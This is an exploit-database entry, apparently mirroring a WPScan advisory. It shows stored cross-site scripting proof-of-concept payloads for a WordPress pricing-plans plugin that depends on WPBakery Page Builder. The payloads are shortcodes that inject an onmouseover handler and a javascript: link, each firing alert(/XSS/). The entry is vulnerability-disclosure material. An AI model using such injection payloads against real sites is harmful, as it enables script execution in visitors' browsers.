## https://sploitus.com/exploit?id=WPEX-ID:D7685AF2-6034-49EA-93EF-4DEBE72689BC
Note: The plugin requires WPBakery Page Builder (slug: js_compressor)
[vca_pricing_plans_child vca_pp_columns='" onmouseover="alert(/XSS/)" style="background:red;"']
Note (WPScan):
Other attributes were also found vulnerable when verifying the issue, for example: [vca_pricing_plans_child vca_pp_purchase_link='javascript:alert(/XSS/)']